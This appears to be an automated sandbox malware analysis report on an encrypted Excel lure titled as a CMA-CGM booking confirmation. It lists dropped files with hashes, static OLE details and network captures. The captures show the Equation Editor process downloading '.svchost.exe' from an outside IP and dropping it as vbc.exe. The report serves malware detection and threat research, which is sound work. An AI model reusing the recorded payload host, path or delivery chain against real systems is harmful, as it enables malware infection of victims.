      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E885A8A9.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
      Category:dropped
      Size (bytes):62140
      Entropy (8bit):7.529847875703774
      Encrypted:false
      SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
      MD5:722C1BE1697CFCEAE7BDEFB463265578
      SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
      SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
      SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
      Malicious:false
      Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso3C39.tmp
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
      Category:dropped
      Size (bytes):1254
      Entropy (8bit):5.835900066445133
      Encrypted:false
      SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
      MD5:A3C62E516777C15BF216F12143693C61
      SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
      SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
      SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
      Malicious:false
      Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso3C3A.tmp
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
      Category:dropped
      Size (bytes):1254
      Entropy (8bit):5.835900066445133
      Encrypted:false
      SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
      MD5:A3C62E516777C15BF216F12143693C61
      SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
      SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
      SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
      Malicious:false
      Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\mso3C3B.tmp
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
      Category:dropped
      Size (bytes):1254
      Entropy (8bit):5.835900066445133
      Encrypted:false
      SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
      MD5:A3C62E516777C15BF216F12143693C61
      SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
      SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
      SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
      Malicious:false
      Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE456.tmp
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
      Category:dropped
      Size (bytes):1254
      Entropy (8bit):5.835900066445133
      Encrypted:false
      SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
      MD5:A3C62E516777C15BF216F12143693C61
      SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
      SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
      SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
      Malicious:false
      Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE457.tmp
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
      Category:dropped
      Size (bytes):1254
      Entropy (8bit):5.835900066445133
      Encrypted:false
      SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
      MD5:A3C62E516777C15BF216F12143693C61
      SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
      SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
      SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
      Malicious:false
      Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoE487.tmp
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
      Category:dropped
      Size (bytes):1254
      Entropy (8bit):5.835900066445133
      Encrypted:false
      SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
      MD5:A3C62E516777C15BF216F12143693C61
      SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
      SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
      SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
      Malicious:false
      Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
      C:\Users\user\Desktop\~$CMA-CGM BOOKING CONFIRMATION.xlsx
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):330
      Entropy (8bit):1.4377382811115937
      Encrypted:false
      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
      MD5:96114D75E30EBD26B572C1FC83D1D02E
      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
      Malicious:true
      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      C:\Users\Public\vbc.exe
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):271464
      Entropy (8bit):4.804431914533398
      Encrypted:false
      SSDEEP:1536:d/k1xdvMuWnLtmBcSa9O/C0UzIY+SpAkaYQryC7AfT/k1xD:5ktvMu8GcSaw/RQ80fDkz
      MD5:08730CDD286A4C9D46B38BB6545AC311
      SHA1:001BB7B5B8D63E505661D7E4A178D08ABE6BBAD7
      SHA-256:CB2A2537987E45C8461D40A0EC6C24215920519257134DB91DD1369FF5ABF342
      SHA-512:A6531EB4709AF3E1270F1C4434D9ABC87097E9F8D38C4BA5DC0ED61D7F469552DE7259F638728FE71297D3748823064F75728E71DF3531657A5AEB1952F412D8
      Malicious:true
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....fI.................`..........<........p....@.................................^i.......................................d..(..................P.......................................................(... ....................................text....Y.......`.................. ..`.data........p.......p..............@....rsrc..............................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

      Static File Info

      General

      File type:CDFV2 Encrypted
      Entropy (8bit):7.993665420902854
      TrID:
      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
      File name:CMA-CGM BOOKING CONFIRMATION.xlsx
      File size:1215488
      MD5:1a23b8c8e5fa52a917c92207a8316b55
      SHA1:7b481fe511b2132d2d2dc7cad79aa5ebda0d3388
      SHA256:9584a27702d6f6fdecc4589a5c87b529ef2c41ca556ddf9325999a4bdb58fcc3
      SHA512:25b6303a6aa2996b82c0f6572d74e9b6bf39a617179f5c2a984643e953a7dcd56662e590fca95ae7b23e0cdf8873c86f5cc6d4417a3a5e5f071c0db5d8c10f86
      SSDEEP:24576:D892LGrd0Hux7uTn/RtxlAncSrS/w90LeFmTg6xexMzv:gc6rVgnw+DLfBRb
      File Content Preview:........................>...............................................................................................z.......|.......~......................................................................................................................

      File Icon

      Icon Hash:e4e2aa8aa4b4bcb4

      Static OLE Info

      General

      Document Type:OLE
      Number of OLE Files:1

      OLE File "CMA-CGM BOOKING CONFIRMATION.xlsx"

      Indicators

      Has Summary Info:False
      Application Name:unknown
      Encrypted Document:True
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:False
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:
      Flash Objects Count:
      Contains VBA Macros:False

      Streams

      Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
      General
      Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
      File Type:data
      Stream Size:64
      Entropy:2.73637206947
      Base64 Encoded:False
      Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
      Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
      Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
      General
      Stream Path:\x6DataSpaces/DataSpaceMap
      File Type:data
      Stream Size:112
      Entropy:2.7597816111
      Base64 Encoded:False
      Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
      Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
      Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
      General
      Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
      File Type:data
      Stream Size:200
      Entropy:3.13335930328
      Base64 Encoded:False
      Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
      Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
      General
      Stream Path:\x6DataSpaces/Version
      File Type:data
      Stream Size:76
      Entropy:2.79079600998
      Base64 Encoded:False
      Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
      Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
      Stream Path: EncryptedPackage, File Type: data, Stream Size: 1202040
      General
      Stream Path:EncryptedPackage
      File Type:data
      Stream Size:1202040
      Entropy:7.99856683358
      Base64 Encoded:True
      Data ASCII:k W . . . . . . " . . . . . ` l . . W 2 l . . . . . . ) ! . ] . & a . w . # . . . . . . . . . . [ G . . . . . . . . L . . . u . V > . . ( . . 3 x m . . . . . . \\ 4 . S . . . : x m . . . . . . \\ 4 . S . . . : x m . . . . . . \\ 4 . S . . . : x m . . . . . . \\ 4 . S . . . : x m . . . . . . \\ 4 . S . . . : x m . . . . . . \\ 4 . S . . . : x m . . . . . . \\ 4 . S . . . : x m . . . . . . \\ 4 . S . . . : x m . . . . . . \\ 4 . S . . . : x m . . . . . . \\ 4 . S . . . : x m . . . . . . \\ 4 . S . . . : x m . . . . . .
      Data Raw:6b 57 12 00 00 00 00 00 22 c8 de b3 d1 be 60 6c c4 b9 57 32 6c c4 fb c8 ef 87 e2 29 21 d9 5d e6 26 61 85 77 df 23 9e 09 7f 0e e8 d8 94 dd e1 a1 5b 47 9a d5 fc 90 91 18 06 f4 4c 9a 94 2e 75 85 56 3e 18 e9 28 e1 15 33 78 6d 1f fb cc 08 bc da 5c 34 ac 53 e5 e6 d4 3a 78 6d 1f fb cc 08 bc da 5c 34 ac 53 e5 e6 d4 3a 78 6d 1f fb cc 08 bc da 5c 34 ac 53 e5 e6 d4 3a 78 6d 1f fb cc 08 bc da
      Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
      General
      Stream Path:EncryptionInfo
      File Type:data
      Stream Size:224
      Entropy:4.54047950889
      Base64 Encoded:False
      Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . ; q . . v . . K . V . N i - j . . . . . ~ . . . . . . . . . . . . . . . . . R . . . . . . . E . . ; F . & . . . . . . . E . Q . . 0 . .
      Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

      Network Behavior

      Network Port Distribution

      TCP Packets

      TimestampSource PortDest PortSource IPDest IP
      Jul 19, 2021 19:39:29.490291119 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:29.737577915 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:29.737865925 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:29.738285065 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:29.988358021 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:29.988424063 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:29.988461018 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:29.988501072 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:29.988823891 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.236027956 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.236061096 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.236082077 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.236102104 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.236119986 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.236139059 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.236160040 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.236191034 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.236301899 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.236330986 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.483170033 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.483197927 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.483212948 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.483227968 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.483243942 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.483253956 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.483263016 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.483275890 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.483288050 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.483294964 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.483299971 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.483304977 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.483313084 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.483325005 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.483335972 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.483341932 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.483355999 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.483356953 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.483372927 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.483386993 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.483408928 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.484755993 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.731908083 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.731960058 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.731983900 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732009888 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732034922 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732052088 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732074976 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732090950 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732112885 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732136011 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732156992 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732177973 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732198000 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732223034 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.732227087 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732250929 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732250929 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.732255936 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.732259989 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.732261896 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.732273102 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732296944 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732316017 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732337952 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.732342958 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732345104 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.732363939 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.732367039 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732367992 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.732388020 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.732388020 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732408047 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.732410908 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732434034 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.732434034 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732455969 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732460022 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.732477903 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.732479095 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732497931 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.732500076 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732515097 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.732527971 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732552052 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.732585907 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.732604027 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.733710051 CEST4916580192.168.2.22180.214.239.39
      Jul 19, 2021 19:39:30.979657888 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.979701042 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.979717970 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.979732990 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.979748011 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.979762077 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.979775906 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.979790926 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.979804993 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.979824066 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.979840040 CEST8049165180.214.239.39192.168.2.22
      Jul 19, 2021 19:39:30.979851007 CEST8049165180.214.239.39192.168.2.22

      HTTP Request Dependency Graph

      • 180.214.239.39

      HTTP Packets

      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.2249165180.214.239.3980C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      TimestampkBytes transferredDirectionData
      Jul 19, 2021 19:39:29.738285065 CEST0OUTGET /disk/.svchost.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 180.214.239.39
      Connection: Keep-Alive
      Jul 19, 2021 19:39:29.988358021 CEST1INHTTP/1.1 200 OK
      Date: Mon, 19 Jul 2021 17:39:29 GMT
      Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
      Last-Modified: Mon, 19 Jul 2021 08:52:32 GMT
      ETag: "42468-5c7760eda0fd0"
      Accept-Ranges: bytes
      Content-Length: 271464
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: application/x-msdownload
